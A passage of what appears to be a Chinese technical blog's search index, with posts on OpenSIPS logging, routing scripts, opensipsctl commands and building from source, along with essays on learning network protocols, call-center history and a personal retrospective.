第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; /etc/rsyslog.d/opensips.conf 第三步,创建日志文件\ntouch /var/log/opensips.log 第四步,重启rsyslog和opensips\nservice rsyslog restart opensipsctl restart 第五步,验证结果\ntail /var/log/opensips.log 日志回滚 为了避免日志文件占用过多磁盘空间,需要做日志回滚。\n安装logrotate apt install logrotate -y 日志回滚配置文件 /etc/logrotate.d/opensips\n/var/log/opensips.log { noolddir size 10M rotate 100 copytruncate compress sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 配置定时任务","title":"设置独立日志文件"},{"content":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.0.0.10\u0026#34;; t_relay(); } } 脚本一般由三个部分组成:\n全局参数配置 模块加载与参数配置 路由逻辑 全局参数配置 debug=2 # log level 2 (NOTICE) debug值越大,日志越详细 log_stderror=0 #log to syslog log_facility=LOG_LOCAL0 
log_name=\u0026#34;sbc\u0026#34; listen=udp:127.0.0.1:5060 listen=tcp:192.168.1.5:5060 as 10.10.1.10:5060 listen=tls:192.168.1.5:5061 advertised_address=7.7.7.7 #global option, for all listeners 模块加载与参数配置 按照绝对路径加载模块\nloadmodule \u0026#34;/lib/opensips/modules/rr.so\u0026#34; loadmodule \u0026#34;/lib/opensips/modules/tm.so\u0026#34; 统一前缀加载模块\nmpath=\u0026#34;/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch5/routing-script/","summary":"脚本预处理 如果你的opensips.cfg文件不大,可以写成一个文件。否则建议使用include_file引入配置文件。\ninclude_file \u0026#34;global.cfg\u0026#34; 有些配置,建议使用m4宏处理。\n脚本结构 ####### Global Parameters ######### debug=3 log_stderror=no fork=yes children=4 listen=udp:127.0.0.1:5060 ####### Modules Section ######## mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;signaling.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;uri.so\u0026#34; loadmodule \u0026#34;sipmsgops.so\u0026#34; modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) ####### Routing Logic ######## route{ if ( has_totag() ) { loose_route(); route(relay); } if ( from_uri!=myself \u0026amp;\u0026amp; uri!=myself ) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } record_route(); route(relay); } route[relay] { if (is_method(\u0026#34;INVITE\u0026#34;)) t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; } failure_route[missed_call] { if (t_check_status(\u0026#34;486\u0026#34;)) { $rd = \u0026#34;127.","title":"配置文件"},{"content":"可以使用以下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法,
如果有问题,会提示哪行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分号了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap ............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .............................. start OpenSIPS stop ............................... stop OpenSIPS -- command \u0026#39;acl\u0026#39; - manage access control lists (acl) acl show [\u0026lt;username\u0026gt;] .............. show user membership acl grant \u0026lt;username\u0026gt; \u0026lt;group\u0026gt; ....... grant user membership (*) acl revoke \u0026lt;username\u0026gt; [\u0026lt;group\u0026gt;] .... grant user membership(s) (*) -- command \u0026#39;cr\u0026#39; - manage carrierroute tables cr show ....................................................... show tables cr reload ..................................................... reload tables cr dump ....................................................... show in memory tables cr addrt \u0026lt;routing_tree_id\u0026gt; \u0026lt;routing_tree\u0026gt; ..................... add a tree cr rmrt \u0026lt;routing_tree\u0026gt; ....................................... rm a tree cr addcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;rewrite_host\u0026gt; ................ \u0026lt;prob\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;rewrite_prefix\u0026gt; \u0026lt;rewrite_suffix\u0026gt; ...............
\u0026lt;flags\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;comment\u0026gt; .........................add a carrier (prob, strip, rewrite_prefix, rewrite_suffix,................... flags, mask and comment are optional arguments) ............... cr rmcarrier \u0026lt;carrier\u0026gt; \u0026lt;scan_prefix\u0026gt; \u0026lt;domain\u0026gt; ................ rm a carrier -- command \u0026#39;rpid\u0026#39; - manage Remote-Party-ID (RPID) rpid add \u0026lt;username\u0026gt; \u0026lt;rpid\u0026gt; ......... add rpid for a user (*) rpid rm \u0026lt;username\u0026gt; ................. set rpid to NULL for a user (*) rpid show \u0026lt;username\u0026gt; ............... show rpid of a user -- command \u0026#39;add|passwd|rm\u0026#39; - manage subscribers add \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; .......... add a new subscriber (*) passwd \u0026lt;username\u0026gt; \u0026lt;passwd\u0026gt; ......... change user\u0026#39;s password (*) rm \u0026lt;username\u0026gt; ...................... delete a user (*) -- command \u0026#39;add|dump|reload|rm|show\u0026#39; - manage address address show ...................... show db content address dump ...................... show cache content address reload .................... reload db table into cache address add \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; \u0026lt;proto\u0026gt; [\u0026lt;context_info\u0026gt;] [\u0026lt;pattern\u0026gt;] ....................... add a new entry ....................... (from_pattern and tag are optional arguments) address rm \u0026lt;grp\u0026gt; \u0026lt;ip\u0026gt; \u0026lt;mask\u0026gt; \u0026lt;port\u0026gt; ............... remove all entries ....................... 
for the given grp ip mask port -- command \u0026#39;dr\u0026#39; - manage dynamic routing * Examples: dr addgw \u0026#39;1\u0026#39; 10 \u0026#39;192.168.2.2\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW001\u0026#39; 0 \u0026#39;first_gw\u0026#39; * dr addgw \u0026#39;2\u0026#39; 20 \u0026#39;192.168.2.3\u0026#39; 0 \u0026#39;\u0026#39; \u0026#39;GW002\u0026#39; 0 \u0026#39;second_gw\u0026#39; * dr rmgw 2 * dr addgrp \u0026#39;alice\u0026#39; \u0026#39;example.com\u0026#39; 10 \u0026#39;first group\u0026#39; * dr rmgrp 1 * dr addcr \u0026#39;cr_1\u0026#39; \u0026#39;10\u0026#39; 0 \u0026#39;CARRIER_1\u0026#39; \u0026#39;first_carrier\u0026#39; * dr rmcr 1 * dr addrule \u0026#39;10,20\u0026#39; \u0026#39;+1\u0026#39; \u0026#39;20040101T083000\u0026#39; 0 0 \u0026#39;1,2\u0026#39; \u0026#39;NA_RULE\u0026#39; \u0026#39;NA routing\u0026#39; * dr rmrule 1 dr show ............................ show dr tables dr addgw \u0026lt;gwid\u0026gt; \u0026lt;type\u0026gt; \u0026lt;address\u0026gt; \u0026lt;strip\u0026gt; \u0026lt;pri_prefix\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;probe_mode\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway dr rmgw \u0026lt;id\u0026gt; ....................... delete gateway dr addgrp \u0026lt;username\u0026gt; \u0026lt;domain\u0026gt; \u0026lt;groupid\u0026gt; \u0026lt;description\u0026gt; ................................. add gateway group dr rmgrp \u0026lt;id\u0026gt; ...................... delete gateway group dr addcr \u0026lt;carrierid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;flags\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ........................... add carrier dr rmcr \u0026lt;id\u0026gt; ....................... delete carrier dr addrule \u0026lt;groupid\u0026gt; \u0026lt;prefix\u0026gt; \u0026lt;timerec\u0026gt; \u0026lt;priority\u0026gt; \u0026lt;routeid\u0026gt; \u0026lt;gwlist\u0026gt; \u0026lt;attrs\u0026gt; \u0026lt;description\u0026gt; ................................. 
add rule dr rmrule \u0026lt;ruleid\u0026gt; ................. delete rule dr reload .......................... reload dr tables dr gw_status ....................... show gateway status dr carrier_status .................. show carrier status -- command \u0026#39;dispatcher\u0026#39; - manage dispatcher * Examples: dispatcher addgw 1 sip:1.2.3.1:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og1\u0026#39; \u0026#39;Outbound Gateway1\u0026#39; * dispatcher addgw 2 sip:1.2.3.4:5050 \u0026#39;\u0026#39; 0 50 \u0026#39;og2\u0026#39; \u0026#39;Outbound Gateway2\u0026#39; * dispatcher rmgw 4 dispatcher show ..................... show dispatcher gateways dispatcher reload ................... reload dispatcher gateways dispatcher dump ..................... show in memory dispatcher gateways dispatcher addgw \u0026lt;setid\u0026gt; \u0026lt;destination\u0026gt; \u0026lt;socket\u0026gt; \u0026lt;state\u0026gt; \u0026lt;weight\u0026gt; \u0026lt;attrs\u0026gt; [description] .......................... add gateway dispatcher rmgw \u0026lt;id\u0026gt; ................ delete gateway -- command \u0026#39;registrant\u0026#39; - manage registrants * Examples: registrant add sip:opensips.org \u0026#39;\u0026#39; sip:user@opensips.org \u0026#39;\u0026#39; user password sip:user@localhost \u0026#39;\u0026#39; 3600 \u0026#39;\u0026#39; registrant show ......................... show registrant table registrant dump ......................... show registrant status registrant add \u0026lt;registrar\u0026gt; \u0026lt;proxy\u0026gt; \u0026lt;aor\u0026gt; \u0026lt;third_party_registrant\u0026gt; \u0026lt;username\u0026gt; \u0026lt;password\u0026gt; \u0026lt;binding_URI\u0026gt; \u0026lt;binding_params\u0026gt; \u0026lt;expiry\u0026gt; \u0026lt;forced_socket\u0026gt; . add a registrant registrant rm ........................... removes the entire registrant table registrant rmaor \u0026lt;id\u0026gt; ................... 
removes the gived aor id -- command \u0026#39;db\u0026#39; - database operations db exec \u0026lt;query\u0026gt; ..................... execute SQL query db roexec \u0026lt;roquery\u0026gt; ................. execute read-only SQL query db run \u0026lt;id\u0026gt; ......................... execute SQL query from $id variable db rorun \u0026lt;id\u0026gt; ....................... execute read-only SQL query from $id variable db show \u0026lt;table\u0026gt; ..................... display table content -- command \u0026#39;speeddial\u0026#39; - manage speed dials (short numbers) speeddial show \u0026lt;speeddial-id\u0026gt; ....... show speeddial details speeddial list \u0026lt;sip-id\u0026gt; ............. list speeddial for uri speeddial add \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; \u0026lt;new-uri\u0026gt; [\u0026lt;desc\u0026gt;] ... ........................... add a speedial (*) speeddial rm \u0026lt;sip-id\u0026gt; \u0026lt;sd-id\u0026gt; ....... remove a speeddial (*) speeddial help ...................... help message - \u0026lt;speeddial-id\u0026gt;, \u0026lt;sd-id\u0026gt; must be an AoR (username@domain) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;new-uri\u0026gt; must be a SIP AoR (sip:username@domain) - \u0026lt;desc\u0026gt; a description for speeddial -- command \u0026#39;avp\u0026#39; - manage AVPs avp list [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... list AVPs avp add [-T table] \u0026lt;sip-id|uuid\u0026gt; \u0026lt;attribute\u0026gt; \u0026lt;type\u0026gt; \u0026lt;value\u0026gt; ............ add AVP (*) avp rm [-T table] [-u \u0026lt;sip-id|uuid\u0026gt;] [-a attribute] [-v value] [-t type] ... remove AVP (*) avp help .................................. 
help message - -T - table name - -u - SIP id or unique id - -a - AVP name - -v - AVP value - -t - AVP name and type (0 (str:str), 1 (str:int), 2 (int:str), 3 (int:int)) - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain) - \u0026lt;uuid\u0026gt; must be a string but not AoR -- command \u0026#39;alias_db\u0026#39; - manage database aliases alias_db show \u0026lt;alias\u0026gt; .............. show alias details alias_db list \u0026lt;sip-id\u0026gt; ............. list aliases for uri alias_db add \u0026lt;alias\u0026gt; \u0026lt;sip-id\u0026gt; ...... add an alias (*) alias_db rm \u0026lt;alias\u0026gt; ................ remove an alias (*) alias_db help ...................... help message - \u0026lt;alias\u0026gt; must be an AoR (username@domain)\u0026#34; - \u0026lt;sip-id\u0026gt; must be an AoR (username@domain)\u0026#34; -- command \u0026#39;domain\u0026#39; - manage local domains domain reload ....................... reload domains from disk domain show ......................... show current domains in memory domain showdb ....................... show domains in the database domain add \u0026lt;domain\u0026gt; ................. add the domain to the database domain rm \u0026lt;domain\u0026gt; .................. delete the domain from the database -- command \u0026#39;cisco_restart\u0026#39; - restart CISCO phone (NOTIFY) cisco_restart \u0026lt;uri\u0026gt; ................ restart phone configured for \u0026lt;uri\u0026gt; -- command \u0026#39;online\u0026#39; - dump online users from memory online ............................. display online users -- command \u0026#39;monitor\u0026#39; - show internal status monitor ............................ show server\u0026#39;s internal status -- command \u0026#39;ping\u0026#39; - ping a SIP URI (OPTIONS) ping \u0026lt;uri\u0026gt; ......................... 
ping \u0026lt;uri\u0026gt; with SIP OPTIONS -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry -- command \u0026#39;fifo\u0026#39; fifo ............................... send raw FIFO command ➜ ~ opopensipsctl ul /bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) ERROR: usrloc - too few parameters -- command \u0026#39;ul\u0026#39; - manage user location records ul show [\u0026lt;username\u0026gt;]................ show in-RAM online users ul show --brief..................... show in-RAM online users in short format ul rm \u0026lt;username\u0026gt; [\u0026lt;contact URI\u0026gt;].... delete user\u0026#39;s usrloc entries ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; ............ introduce a permanent usrloc entry ul add \u0026lt;username\u0026gt; \u0026lt;uri\u0026gt; \u0026lt;expires\u0026gt; .. introduce a temporary usrloc entry opensips命令 opensips -h\n有时候,你用opensipsctl start 启动opensips时,你可能会想,opensips是从哪个目录读取opensips.cfg文件的,那你可以输入opensips -h。输出的结果,第一行就包括了默认的配置文件的位置。\n-f file Configuration file (default /usr/local//etc/opensips/opensips.cfg) -c Check configuration file for errors -C Similar to \u0026#39;-c\u0026#39; but in addition checks the flags of exported functions from included route blocks -l address Listen on the specified address/interface (multiple -l mean listening on more addresses). The address format is [proto:]addr[:port], where proto=udp|tcp and addr= host|ip_address|interface_name. 
E.g: -l locahost, -l udp:127.0.0.1:5080, -l eth0:5062 The default behavior is to listen on all the interfaces. -n processes Number of worker processes to fork per UDP interface (default: 8) -r Use dns to check if is necessary to add a \u0026#34;received=\u0026#34; field to a via -R Same as `-r` but use reverse dns; (to use both use `-rR`) -v Turn on \u0026#34;via:\u0026#34; host checking when forwarding replies -d Debugging mode (multiple -d increase the level) -D Run in debug mode -F Daemon mode, but leave main process foreground -E Log to stderr -N processes Number of TCP worker processes (default: equal to `-n`) -W method poll method -V Version number -h This help message -b nr Maximum receive buffer size which will not be exceeded by auto-probing procedure even if OS allows -m nr Size of shared memory allocated in Megabytes 默认32MB -M nr Size of pkg memory allocated in Megabytes 默认2MB -w dir Change the working directory to \u0026#34;dir\u0026#34; (default \u0026#34;/\u0026#34;) -t dir Chroot to \u0026#34;dir\u0026#34; -u uid Change uid -g gid Change gid -P file Create a pid file -G file Create a pgid file ","permalink":"https://wdd.js.org/opensips/ch3/opensipsctl/","summary":"可以使用一下命令查找opensips的相关文件夹\nfind / -name opensips -type d 一般来说,重要的是opensips.cfg文件,这个文件一般位于/usr/local/etc/opensips/或者/usr/etc/opensips中。主要还是要看安装时选择的默认路径。\n其中1.x版本的配置文件一般位于/usr/etc/opensips目录中,2.x版本的配置一般位于/usr/local/etc/opensips目录中。\n下面主要讲解几个命令。\n配置文件校验 校验opensips.cfg脚本是否合法, 如果有问题,会提示那行代码有问题,但是报错位置好像一直不准确。很多时候可能是忘记写分好了。\nopensips -C opensips.cfg 启动关闭与重启 使用opensipsctl命令做数据库操作前,需要先配置opensipsctlrc文件\nopensips start|stop|restart opensipsctl start|stop|restart 资源创建 opensipsdbctl create # 创建数据库 opensipsctl domain add abc.cc #创建域名 opensipsctl add 1001@test.cc 12346 # 新增用户 opensipsctl rm 1001@test.cc # 删除用户 opensipsctl passwdd 1001@test.cc 09879 # 修改密码 opensipsctl -h 显示所有可用命令\n/usr/local/sbin/opensipsctl $Revision: 4448 $ Existing commands: -- command \u0026#39;start|stop|restart|trap\u0026#39; trap 
............................... trap with gdb OpenSIPS processes restart ............................ restart OpenSIPS start .","title":"opensips管理命令"},{"content":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","permalink":"https://wdd.js.org/opensips/ch3/install-opensips/","summary":"1. 安装依赖 apt-get update -qq \u0026amp;\u0026amp; apt-get install -y build-essential net-tools \\ bison flex m4 pkg-config libncurses5-dev rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev wget lsof 2. 编译 下载opensips-2.4.7的源码,然后解压。\ninclude_moduls可以按需指定,你可以只写你需要的模块。\ncd /usr/local/src/opensips-2.4.7 make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; make install include_modules=\u0026#34;db_mysql httpd db_http siprec regex rest_client carrierroute dialplan b2b_logic cachedb_redis proto_tls proto_wss tls_mgm\u0026#34; ","title":"debian jessie opensips 2.4.7 安装"},{"content":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 
协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应用层负责处理特定的应用程序细节。 运输层主要为两台主机上的应用程序提供端到端的通信。 网络层处理分组在网络中的活动,例如分组的选路 链路层处理与电缆(或其他任何传输媒介)的物理接口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音和视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,即End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性由上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络层,\n那么端口号和ip地址到底有什么区别呢?\nip用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接收消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的哪个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并不厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","permalink":"https://wdd.js.org/posts/2019/01/books-about-network-protocol/","summary":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应用层负责处理特定的应用程序细节。 运输层主要为两台主机上的应用程序提供端到端的通信。 网络层处理分组在网络中的活动,例如分组的选路 链路层处理与电缆(或其他任何传输媒介)的物理接口细节 下面重点讲一下运输层和网络层\n1.1.
运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音和视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,即End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性由上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络层,\n那么端口号和ip地址到底有什么区别呢?\nip用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接收消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的哪个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并不厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","title":"如何学习网络协议?"},{"content":"什么是呼叫中心? 
呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】","title":"呼叫中心简史"},{"content":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 